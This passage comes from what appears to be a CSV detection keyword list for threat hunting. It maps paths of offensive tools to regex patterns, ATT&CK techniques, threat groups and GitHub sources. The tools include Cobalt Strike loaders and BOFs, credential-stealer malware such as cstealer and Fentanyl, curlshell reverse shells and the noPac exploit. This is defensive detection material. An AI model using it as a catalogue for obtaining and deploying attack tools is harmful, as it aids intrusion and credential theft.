- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/cs2modrewrite/*",".{0,1000}\/cs2modrewrite\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*/CS-BOFs/*",".{0,1000}\/CS\-BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/CSExec.py*",".{0,1000}\/CSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*/CSExec.py.git*",".{0,1000}\/CSExec\.py\.git.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*/csharp/process_injection/*",".{0,1000}\/csharp\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/CSharpWinRM*",".{0,1000}\/CSharpWinRM.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/C--Shellcode*",".{0,1000}\/C\-\-Shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*/CS-Loader.go*",".{0,1000}\/CS\-Loader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/CS-Loader/*",".{0,1000}\/CS\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/CsOnTheFly.ps1*",".{0,1000}\/CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/csOnvps/*",".{0,1000}\/csOnvps\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/cs-rdll-ipc-example/*",".{0,1000}\/cs\-rdll\-ipc\-example\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*/CS-Remote-OPs-BOF*",".{0,1000}\/CS\-Remote\-OPs\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/cstealer.git*",".{0,1000}\/cstealer\.git.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*/cstealer.py*",".{0,1000}\/cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*/cs-token-vault/*",".{0,1000}\/cs\-token\-vault\/.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*/ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1897","287","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z" "*/ctftool*",".{0,1000}ctftool.{0,1000}","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/taviso/ctftool","1","0","N/A","N/A","10","1631","277","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z" "*/cube0x0/noPac*",".{0,1000}\/cube0x0\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/cube0x0/noPac","1","1","N/A","N/A","10","1300","319","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z" "*/cuddlephish.git*",".{0,1000}\/cuddlephish\.git.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*/cuddlephish.html*",".{0,1000}\/cuddlephish\.html.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized 
Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*/cups-info.nse*",".{0,1000}\/cups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cups-queue-info.nse*",".{0,1000}\/cups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/curl.cna",".{0,1000}\/curl\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x64.o",".{0,1000}\/curl\.x64\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x86.o",".{0,1000}\/curl\.x86\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell.py*",".{0,1000}\/curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell-main.*",".{0,1000}\/curlshell\-main\..{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell-main/*",".{0,1000}\/curlshell\-main\/.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/cursorinit.vbs*",".{0,1000}\/cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*/custom_crack_list.txt*",".{0,1000}\/custom_crack_list\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 